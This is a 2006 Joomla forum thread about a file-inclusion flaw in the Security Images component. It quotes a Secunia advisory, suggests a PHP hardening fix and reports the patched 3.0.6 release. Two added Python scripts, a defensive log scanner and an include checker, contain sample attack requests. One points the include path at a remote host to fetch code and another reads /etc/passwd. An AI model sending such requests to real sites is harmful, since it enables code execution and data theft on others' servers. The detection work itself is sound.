[UPGRADE AVAIL.] Security Images Vulnerability
- Elpie
- Joomla! Guru
- Posts: 903
- Joined: Wed Aug 17, 2005 11:26 pm
[UPGRADE AVAIL.] Security Images Vulnerability
Remote file include exploit is in the wild.
Last edited by RobS on Thu Aug 10, 2006 8:17 pm, edited 1 time in total.
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info
-
- Joomla! Enthusiast
- Posts: 182
- Joined: Thu Aug 18, 2005 8:43 pm
Re: Security Images 3.0.5
more specifics?
- Elpie
- Joomla! Guru
- Posts: 903
- Joined: Wed Aug 17, 2005 11:26 pm
Re: Security Images 3.0.5
I wish I could give more specifics, but as far as I am aware an official advisory has not yet been issued. I got my information from two blackhat sites, both giving scripts to use. I can only share that information with the project's developers, sorry.
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info
-
- Joomla! Explorer
- Posts: 469
- Joined: Thu Aug 18, 2005 10:40 pm
- Location: las vegas USA
Re: Security Images 3.0.5
TITLE:
Joomla Security Images Component File Inclusion
SECUNIA ADVISORY ID:
SA21260
VERIFY ADVISORY:
http://secunia.com/advisories/21260/
CRITICAL:
Highly critical
IMPACT:
System access
WHERE:
From remote
SOFTWARE:
Security Images 3.x (component for Joomla)
http://secunia.com/product/11186/
DESCRIPTION:
Drago84 has discovered some vulnerabilities in the Security Images
component for Joomla, which can be exploited by malicious people to
compromise a vulnerable system.
Input passed to the "mosConfig_absolute_path" parameter is not
properly verified before being used to include files. This can be
exploited to execute arbitrary PHP code by including files from local
or external resources.
Affected files:
administrator/components/com_securityimages/configinsert.php
administrator/components/com_securityimages/lang.php
Successful exploitation requires that "register_globals" is enabled.
The vulnerabilities have been confirmed in version 3.0.5. Other
versions may also be affected.
SOLUTION:
Edit the source code to ensure that input is properly verified.
Set "register_globals" to "Off".
PROVIDED AND/OR DISCOVERED BY:
Drago84
ORIGINAL ADVISORY:
http://milw0rm.com/exploits/2083
----------------------------------------------------------------------
Joomla 1.6 Turkish support site http://www.joomlaturk.net/
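The advisory quoted above gives the two things a defender needs to look for exploitation attempts in web-server logs: the two affected scripts and the "mosConfig_absolute_path" parameter that register_globals turns into the include prefix. The script below is an added example (Python), not code from Secunia, milw0rm or the Security Images component. It assumes an Apache/nginx "combined" access-log format; the log lines embedded in it are constructed for illustration (RFC 5737 documentation addresses), not real traffic.

```python
"""Triage a web-server access log for attempts against the Security Images
file-inclusion bug described in SA21260. Added example: not code from the
advisory or the component. Assumes an Apache/nginx "combined" log format;
the sample lines at the bottom are constructed, not real traffic."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Scripts named in the advisory, relative to the Joomla document root.
AFFECTED_FILES = (
    "administrator/components/com_securityimages/configinsert.php",
    "administrator/components/com_securityimages/lang.php",
)
# The request parameter that register_globals turns into the include prefix.
PARAM = "mosConfig_absolute_path"

# Combined-log line: ip ident user [ts] "METHOD url PROTO" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+)[^"]*" (?P<status>\d{3}) \S+'
)


def classify_request(url):
    """Return (affected_file, supplied_value) when the request hits one of the
    affected scripts *and* carries the include-prefix parameter, else None."""
    parts = urlsplit(url)
    path = unquote(parts.path)
    target = next((f for f in AFFECTED_FILES if path.endswith("/" + f)), None)
    if target is None:
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)
    if PARAM not in qs:
        return None
    # parse_qs already decodes once; decode again to catch double-encoding.
    return target, unquote(qs[PARAM][0])


def is_remote_include(value):
    """RFI payloads point the prefix at a URL or stream wrapper so that PHP
    fetches and executes attacker-hosted code."""
    return re.match(r'^(https?|ftps?|php|data)://', value, re.I) is not None


def scan_log(lines):
    """Return one finding per matching request. A remote prefix is rated
    'critical'; any other tampering with the parameter (e.g. a local path
    with a null byte) is rated 'suspicious'."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue
        hit = classify_request(m["url"])
        if hit is None:
            continue
        target, value = hit
        findings.append({
            "ip": m["ip"],
            "time": m["ts"],
            "status": int(m["status"]),
            "file": target,
            "value": value,
            "severity": "critical" if is_remote_include(value) else "suspicious",
        })
    return findings


# Constructed sample log (RFC 5737 documentation addresses, not real hosts).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Aug/2006:08:17:03 +0000] "GET /administrator/components/'
    'com_securityimages/configinsert.php?mosConfig_absolute_path=http://198.51.100.7/c.txt? '
    'HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Aug/2006:08:17:04 +0000] "GET /administrator/components/'
    'com_securityimages/lang.php?mosConfig_absolute_path=%2Fetc%2Fpasswd%00 HTTP/1.1" 200 512',
    '198.51.100.20 - - [10/Aug/2006:09:00:00 +0000] "GET /index.php?option=com_content'
    '&task=view&id=1 HTTP/1.1" 200 9012',
    '192.0.2.9 - - [10/Aug/2006:09:01:00 +0000] "GET /administrator/components/'
    'com_securityimages/lang.php HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['severity']:10} {f['ip']:15} {f['file']} <- {f['value']!r}")
```

A 200 on a "critical" hit does not prove the include succeeded (register_globals may already be off), but the source IP and the hosted payload URL are what you pull next: fetch the payload from a sandbox, and check the web root for files written around that timestamp.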
- RobS
- Joomla! Ace
- Posts: 1366
- Joined: Mon Dec 05, 2005 10:17 am
- Location: New Orleans, LA, USA
Re: Security Images 3.0.5
Thanks all for the info... added to the official list.
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions
-
- Joomla! Apprentice
- Posts: 48
- Joined: Thu Nov 03, 2005 4:46 pm
Re: Security Images 3.0.5
It seems to me that anyone who understands PHP could easily patch Security Images.
Only 2 files are listed as liabilities....
And the fix suggested in this forum is to harden the call to
Code:
require_once($mosConfig_absolute_path."/administrator/components/com_securityimages/lang.php");
by defining the absolute path:
Code:
define( 'YOURBASEPATH', dirname(__FILE__) );
require_once( YOURBASEPATH . '/file_to_include.php' );
Unfortunately, I don't know PHP well enough to apply this.
Anyone?
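The hardening shown in the post above works because the base path is derived from the file's own location (dirname(__FILE__)) rather than from a variable that register_globals lets any request overwrite. The script below is an added example (Python), not code from Security Images or from anyone in this thread; it checks both mitigations the advisory lists across a set of PHP sources: it flags include/require statements whose path begins with a variable the file never assigns itself, and it reads a php.ini fragment for register_globals. The PHP snippets inside it are constructed stand-ins for the affected files, and the function names are the example's own.

```python
"""Check the two mitigations SA21260 lists: (1) no include/require whose path
prefix is a bare variable that register_globals lets a request overwrite,
(2) register_globals itself off. Added example, not code from Security Images
or this thread; the PHP snippets below are constructed stand-ins for the
affected files, and the function names are this example's own."""
import re

# include/require/_once followed by a variable as the first path component.
INCLUDE_RE = re.compile(r'\b(?:include|require)(?:_once)?\s*\(?\s*\$(\w+)\b', re.I)
# "$var = ..." (not "==" / "=>"); ".=" is deliberately not counted, because
# appending to a request-supplied value does not make it trustworthy.
ASSIGN_RE = re.compile(r'\$(\w+)\s*=(?![=>])')


def find_unguarded_includes(source):
    """Return [(line_no, variable)] for includes built from a variable the file
    has not assigned on an earlier line. With register_globals on, such a
    variable is whatever the request supplied."""
    lines = source.splitlines()
    assigned_at = {}
    for n, line in enumerate(lines, 1):
        for m in ASSIGN_RE.finditer(line):
            assigned_at.setdefault(m.group(1), n)
    findings = []
    for n, line in enumerate(lines, 1):
        if line.lstrip().startswith(("//", "#", "*")):
            continue  # single-line comments (block comments are not tracked)
        for m in INCLUDE_RE.finditer(line):
            var = m.group(1)
            if assigned_at.get(var, n + 1) > n:  # never assigned, or only later
                findings.append((n, var))
    return findings


def register_globals_enabled(ini_text):
    """True when a php.ini fragment turns register_globals on. PHP reads
    on/yes/true/1 as enabled (case-insensitive); the last directive wins;
    an absent directive means off, the default since PHP 4.2."""
    value = None
    for raw in ini_text.splitlines():
        line = raw.split(";", 1)[0].strip()  # ';' starts an ini comment
        m = re.match(r'register_globals\s*=\s*(.*)$', line)
        if m:
            value = m.group(1).strip().strip('"\'').lower()
    return value in ("on", "yes", "true", "1")


# Constructed stand-ins for the advisory's affected files.
VULNERABLE_PHP = r'''<?php
// same shape as the unguarded call quoted in the thread
require_once($mosConfig_absolute_path."/administrator/components/com_securityimages/lang.php");
'''

HARDENED_PHP = r'''<?php
// base path derived from this file's own location, not from the request
define( 'YOURBASEPATH', dirname(__FILE__) );
require_once( YOURBASEPATH . '/lang.php' );
'''

ALSO_SAFE_PHP = r'''<?php
// the variable is set by the file itself before it is used
$mosConfig_absolute_path = dirname(__FILE__) . '/../../..';
require_once($mosConfig_absolute_path . '/configuration.php');
'''

INI_OFF = "; hardened\nregister_globals = Off\n"
INI_ON = "register_globals = On\n"

if __name__ == "__main__":
    for name, src in (("vulnerable", VULNERABLE_PHP), ("hardened", HARDENED_PHP),
                      ("self-assigned", ALSO_SAFE_PHP)):
        print(f"{name:14} {find_unguarded_includes(src)}")
    print("register_globals on:", register_globals_enabled(INI_ON))
```

Run find_unguarded_includes over every .php file under the Joomla root, not just the two the advisory names: the same pattern was common in components of that era, and turning register_globals off in php.ini closes the whole class at once, which is why the advisory lists it beside the code fix.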
- Tonie
- Joomla! Master
- Posts: 16553
- Joined: Thu Aug 18, 2005 7:13 am
Re: Security Images 3.0.5
Version 3.0.6 has been brought out: http://forge.joomla.org/sf/projects/com_securityimages.
- tarquel
- Joomla! Apprentice
- Posts: 14
- Joined: Sun Jan 29, 2006 7:49 pm
- Location: Machynlleth, Mid-Wales, UK
Re: Security Images 3.0.5
Wish I could get the new one to work.
Using 3.0.6 and the latest Akobook version, but it just refuses to work.
Only can get the freecap plugin to appear - the other two just don't do anything - and even though it appears to work, when you submit the guestbook entry - having put the security word in, it doesn't work.
I thought that I was being dumb and that I hadn't realised it was case sensitive - but either I'm blind, or it really doesn't want to know.
I did wonder whether the hardening of the latest Joomla but I'm not sure.
If anyone wants to try and see, go to the guestbook at: http://www.threeminutewarning.co.uk
I really feel like never updating any component or Joomla itself again as something always goes wrong hehe
/rant
Cheers
Nath.
Nathan Harmsworth
Network Administrator of YBD [Edu]
Webmaster of Three Minute Warning and tarquel.net
- Elpie
- Joomla! Guru
- Posts: 903
- Joined: Wed Aug 17, 2005 11:26 pm
Re: Security Images 3.0.5
Nath - make sure you report this on the bug tracker on the forge's project pages.
Project devs do see these reports but may miss seeing forum posts.
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info
- tarquel
- Joomla! Apprentice
- Posts: 14
- Joined: Sun Jan 29, 2006 7:49 pm
- Location: Machynlleth, Mid-Wales, UK
Re: Security Images 3.0.5
Hi there
I've just posted a topic on their forum at http://forums.waltercedric.com/index.ph ... ,16.0.html
Can't seem to find the SF for the project hehe Maybe it's me being dumb or something today lol
Cheers
Nath.
Nathan Harmsworth
Network Administrator of YBD [Edu]
Webmaster of Three Minute Warning and tarquel.net
-
- Joomla! Explorer
- Posts: 410
- Joined: Fri Aug 26, 2005 10:13 pm
- Location: Spain
Re: Security Images 3.0.5
Hi Nath,
tarquel wrote:
Hi there
I've just posted a topic on their forum at http://forums.waltercedric.com/index.ph ... ,16.0.html
Can't seem to find the SF for the project hehe Maybe it's me being dumb or something today lol
Cheers
Nath.
From Walter Cedric's wiki you are referred to http://developer.joomla.org/sf/sfmain/d ... rityimages.
So that's the place to go!
My Extensions: JM-Recommend, JM-Credits, JM-Link Us (for J! 1.0.x). Find them in the 3rd Party Extensions Forum.
Joomla test installation: www.poraqui.net/joomla User: test Password: test
- tarquel
- Joomla! Apprentice
- Posts: 14
- Joined: Sun Jan 29, 2006 7:49 pm
- Location: Machynlleth, Mid-Wales, UK
Re: Security Images 3.0.5
Ahhhhh, that's the one.
Thanks [and it looks like all my problems have been mentioned already - except integration into the SMF Bridge perhaps]
Cheers
Nath.
Nathan Harmsworth
Network Administrator of YBD [Edu]
Webmaster of Three Minute Warning and tarquel.net
-
- I've been banned!
- Posts: 21
- Joined: Wed Dec 19, 2007 10:36 pm
Re: Security Images 3.0.5
Tell me more.
Elpie wrote:
I wish I could give more specifics, but as far as I am aware an official advisory has not yet been issued. I got my information from two blackhat sites, both giving scripts to use. I can only share that information with the project's developers, sorry.
smile